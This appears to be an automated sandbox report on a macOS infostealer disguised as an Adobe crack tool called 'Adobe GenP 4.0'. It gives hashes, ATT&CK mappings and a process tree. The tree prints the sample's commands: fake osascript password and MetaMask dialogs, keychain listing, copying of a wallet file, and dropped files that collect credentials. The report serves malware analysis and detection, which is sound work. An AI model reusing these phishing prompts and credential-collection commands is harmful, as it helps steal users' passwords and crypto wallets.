f79b7cbc653696af0dbd867c0a5d47698bcfc05f63b665ad48018d2610b7e97b

Resubmissions

28/08/2024, 16:01

240828-tgps4axaqp 1

27/08/2024, 19:48

27/08/2024, 19:46

23/08/2024, 16:22

23/08/2024, 16:18

23/08/2024, 16:11

Analysis

max time kernel
144s
max time network
125s
platform
macos-10.15_amd64
resource
macos-20240711.1-en
resource tags

arch:amd64arch:i386image:macos-20240711.1-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
23/08/2024, 16:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Adobe GenP 4.0
Size

25.5MB
MD5

e856c089432fc36ac9b0ff5c1616a08f
SHA1

39d48d6499be51fe3bac1d80afc651b6c13082c8
SHA256

a772451ddd6897c00ce766949fc82e30cfb64a6b31b44bfd9068a76ab99dd188
SHA512

344d826edb043963deccf2797d4e6e7ff13353b18ef58a9c13c06ab6958251ee409c0daf56cc21c6d93e3d6d910e48a6fdd26bc75a63dd41c4ff568b37b76f6a
SSDEEP

393216:75v/NAa/L33iurF/zseMR1YASI5sQwmnIWDz0WDFsplFzZCDgzK:7Z/NV3Vs1RTSIyQLdDGQDuK

Score

7^/10

evasion execution

Malware Config

Signatures

System Checks 1 TTPs 1 IoCs

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.

evasion

System Checks

T1497.001

ioc	Process
system_profiler SPHardwareDataType SPSoftwareDataType	Process not Found

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
41	ipinfo.io
42	ipinfo.io
43	ipinfo.io

AppleScript 1 TTPs 2 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

ioc	Process
osascript -e "display dialog \"MacOS wants to access the MetaMask\" default answer \"\" with icon POSIX file \"/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/T/ic.png1646384484\" buttons {\"Cancel\", \"OK\"} default button \"OK\" with title \"Wallet Connect\""	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings\\n\\nPlease enter your password.\" default answer \"\" with hidden answer with icon caution buttons {\"Cancel\", \"OK\"} default button \"OK\" with title \"System Preferences\""	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Adobe GenP 4.0\""
1⤵
PID:491

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Adobe GenP 4.0\""
1⤵
PID:491

/usr/bin/sudo
sudo /bin/zsh -c "/Users/run/Adobe GenP 4.0"
1⤵
PID:491
- /bin/zsh
  /bin/zsh -c "/Users/run/Adobe GenP 4.0"
  2⤵
  PID:492
- /Users/run/Adobe
  /Users/run/Adobe GenP 4.0
  2⤵
  PID:492

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon
1⤵
PID:523

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon
1⤵
PID:524

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:532

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:532

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:534

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:534
- /usr/bin/login
  login -pf run
  2⤵
  PID:535
- - /bin/zsh
    -zsh
    3⤵
    PID:536
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:537
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:538
  - - /usr/local/bin/dir
      dir
      4⤵
      PID:541
  - - /usr/bin/dir
      dir
      4⤵
      PID:541
  - - /bin/dir
      dir
      4⤵
      PID:541
  - - /usr/sbin/dir
      dir
      4⤵
      PID:541
  - - /sbin/dir
      dir
      4⤵
      PID:541
  - - /bin/ls
      ls
      4⤵
      PID:542
  - - ./Adobe GenP 4.0
      "./Adobe GenP 4.0"
      4⤵
      PID:543
    - - /Users/run/Adobe GenP 4.0
        
        "/Users/run/Adobe GenP 4.0" background
        5⤵
        
        PID:544
      - /usr/bin/osascript
        
        osascript -e "display dialog \"To launch the application, you need to update the system settings\\n\\nPlease enter your password.\" default answer \"\" with hidden answer with icon caution buttons {\"Cancel\", \"OK\"} default button \"OK\" with title \"System Preferences\""
        6⤵
        
        PID:545
      - /usr/bin/osascript
        
        osascript -e "display dialog \"MacOS wants to access the MetaMask\" default answer \"\" with icon POSIX file \"/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/T/ic.png1646384484\" buttons {\"Cancel\", \"OK\"} default button \"OK\" with title \"Wallet Connect\""
        6⤵
        
        PID:546
      - /usr/bin/security
        
        security list-keychains
        6⤵
        
        PID:549
      - /bin/cp
        
        cp "/Users/run/Library/Application Support/Binance/.finger-print.fp" /Users/Shared/NW/Wallet/binance/finger-print.fp
        6⤵
        
        PID:550
      - /usr/sbin/system_profiler
        
        system_profiler SPHardwareDataType SPSoftwareDataType
        6⤵
        
        PID:551
      - /usr/bin/pgrep
        
        pgrep firefox
        6⤵
        
        PID:555
  - - /usr/bin/sudo
      sudo su -
      4⤵
      PID:559
  - - /bin/ps
      ps -ef
      4⤵
      PID:560
  - - /usr/bin/grep
      grep adobe
      4⤵
      PID:561

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:547

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:547

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:554

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/Shared/NW/Autofills.txt

Filesize
54B

MD5
cfdb20acfc665ef7b65ab7704f3c2b2c

SHA1
03ece2f986996e43a7d9bde32364d0d10b4337f2

SHA256
a679d24efa1d8431019f830d65bde62578a8da43e88924f3dcc2a923ef46935c

SHA512
11c61114bbe4c279efc6354ac6419a7fa6759a77f1333ba961335efa4785e89e43450ae4a89f51f50b4a5bfe5827a5d2c11ee688dbd70f6635e7a7e9752fabb0

Download Submit
/Users/Shared/NW/Info.txt

Filesize
306B

MD5
6d1d5f22b8d1385bbbe57f9518558528

SHA1
d4fb1621c16e1b34324f25ed47ab8eed7f16ced0

SHA256
472c13454461f0c3021814c609ecf7f33b23444698c88c204ef98f0d70ca6015

SHA512
cc0220cf19240027cf89c70aedfca54cc2f3371ec681adea14e4a0e37b394e3fb3a32e250d93db2f0b75217dad90b8f89649ac0ed8b354e77213d50153b297e6

Download Submit
/Users/Shared/NW/Info.txt

Filesize
252B

MD5
71d93a935e922254950aafd98477356f

SHA1
64bd2bacdce7a15bb3864e35da17cdf678b6acc5

SHA256
4e9a4c09cbfeca8c66ddb1c7a2154e8395918fda199e2d83d53e28bc2c622ff5

SHA512
587fcec5b7c49aaff42e6f60ddefbfaa18cc888076c7394aeac844a67b92c636afe7a6cbce8b35f62a4da45ea0cd643c27a3882a187e782798fab2a6f156bb4f

Download Submit
/Users/Shared/NW/Keychain.txt

Filesize
12KB

MD5
5fa172df1594f07d0458025755bcaddc

SHA1
5f27c74e8083aedb4146415993e16c598fa3e7fa

SHA256
05425b53afcba055cb9b6c2933fd4034222041c03c842a031af1b1113467dd84

SHA512
bf07ae36c40cb2b8504ffaea2759fff069e8b981c2db3b2cd4686f3affdcff7624e752787074afd7860a339476824e35d8b0dc5df181d504bd3752d18616b6c4

Download Submit
/Users/Shared/NW/Keychain.txt

Filesize
12KB

MD5
657e901099256e15590423e6ea417b1e

SHA1
d69cc116fd50f1e16ea5bdc1bfa6c805246e6019

SHA256
5fee32a1eb9e242f12924db44cbb16ab9dbac76ad6d3a937849fef5dc36ed056

SHA512
60e47647acf075359acd40bed880938f6ac40988e3f0630b8ca34b5b56bdcb8cd563a3f7370c1122876f1b99c5192cc97d101101b12ced44b08fdda5bd633507

Download Submit
/Users/Shared/NW/Metamask_pass.txt

Filesize
64B

MD5
d991cd3ed96d3f011b5a004ba0ce5e2f

SHA1
45da3fa4c33345a2ff142c8d38a55a609f0f0bfb

SHA256
62cc239fbba5a6ad928b8ad478aca23e4fdf9b8a129e5ef163d342cde0906278

SHA512
d82b5e0954d41f3884770ff6897757d2d403a4aa9b8b7c1e21704c107531045f3c5b21dd7881f86defd8fc0c55e9cfc0e3eb3f49338f50d00a49ab79b650fcd4

Download Submit
/Users/Shared/NW/Metamask_pass.txt

Filesize
10B

MD5
bf055377eecfe38024fdfa64b3a3c417

SHA1
c741bee5918b30510d7445d2f3dde61333a2be25

SHA256
dc99f3b5ef99339b1ae15547c19600ca6798c7ca30adc6f87db8dea91781496d

SHA512
8cf08dc6ffa5d66a32e266589d5a2c278cef7da4c1f025385746b3ea06860d0e313ecae33fed359f11fc4296c725bb35023f966b5a949d9223b5e3c83f902b81

Download Submit
/Users/Shared/NW/Notes.txt

Filesize
151B

MD5
2ce87368ab7ebb03d1e4b867f7ad959b

SHA1
5d1dd6f5359544be16c755e4ee34b34c71828b75

SHA256
f0a8aae4db0fbddb5bee0b5ff50cfcb04c9b19c7a49e676833ab926d49fcbd16

SHA512
8707e649a6c6a6b432c6594c8d90b8fff6689a4488294f3553bf3d833b1f7f17aed53b096f7cd6a592fd6dd7b0c67bbeaaba98a3c2f5ec639eeff7a4545c4c47

Download Submit
/Users/Shared/NW/Notes.txt

Filesize
205B

MD5
bae166f8770d7d81a886474ef9b22759

SHA1
50c41970b7d23bc352640437b9738896d848e12f

SHA256
a8cff6bc9a167b8e489d7264ac21df4fdbbaf96d333cdd31cbd0efbd4a69ed71

SHA512
b2abbec571d7bc37af9c76358f3f0cdcfbcf49e5d3103d426a6d4a1b7d62e0f34ab4554ec9dd80803b035a881fee07ffb82275a8f9e87955a2f14ccd97eb78a8

Download Submit
/Users/Shared/NW/UserInfo.txt

Filesize
1KB

MD5
1fa9e4dbc4565c44cdcfd6b59b25aa17

SHA1
4f18d06c78532da0c8804e65cf36fed1cabd42f7

SHA256
bd2f30e369eaab25b16ae12eb5c80d62e2ff9776443a8e65aea455433b5000f1

SHA512
420db7f444c4b8b3107a680c4e2931920851e87058df5171a01555e44e93d1fd54bfe7cdbc4f73c81aef79577894ddc82c00c8b8b2cd54d2df344da4858619ff

Download Submit
/Users/Shared/NW/UserInfo.txt

Filesize
1KB

MD5
f47e9b608c2f021b14fe959886d81f84

SHA1
f529b1de04104bf9953ea933b598e63c82a1bde6

SHA256
45ce55c5f62c2a75012f32b6911ab61336cd28284d919085dbd241dba6dcf971

SHA512
e9929ae63f4aba0db6e74c99da2b538785d754e8b7dc11849f4ab072c57b7efc1c315e33f05a431bbe03259b6662721e9f210819bc538e7ee52af473d7d67566

Download Submit
/Users/Shared/NW/[GB]Cthulhu_Mac_OS_2024-08-23_16-20-44.zip

Filesize
3KB

MD5
f7ce8df05a510934db12af7b85d2203f

SHA1
41d8c14b007aa62b90828d99ae83976f3aab20a4

SHA256
a9247615bf3cca2192aeefd14409b58e8b4dbc2ab78feb8c95ebc47c34b7a7f5

SHA512
0ca91c5f31d61b3d9edcc1ce9c0a4cf32a033fe29a58faf3a9d1e27cdce82694a344d247f2b111311f5998fb8f1703417fc7b66e4606621033737e1722a67a70

Download Submit
/private/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/T/ic.png1646384484

Filesize
67KB

MD5
07275ea1cc592132513a9da5d697c10e

SHA1
1f0fb9e092819643bdc818adcea06c43bda9d1c0

SHA256
b1ddba263c47c4bf1494072eef111f30eae4b69f49fb4697c0770a96de1f9c99

SHA512
cc997c46af416874771af70960a55947242403ba7cbb34b2ee92397e29b3c5d251f1dcdef3535410f1979ecf4d7d542d7781790265438193745867316fa2530f

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db

Filesize
47KB

MD5
0e4a0d1ceb2af6f0f8d0167ce77be2d3

SHA1
414ba4c1dc5fc8bf53d550e296fd6f5ad669918c

SHA256
cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030

SHA512
1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db

Filesize
4KB

MD5
d3a1859e6ec593505cc882e6def48fc8

SHA1
f8e6728e3e9de477a75706faa95cead9ce13cb32

SHA256
3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c

SHA512
ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads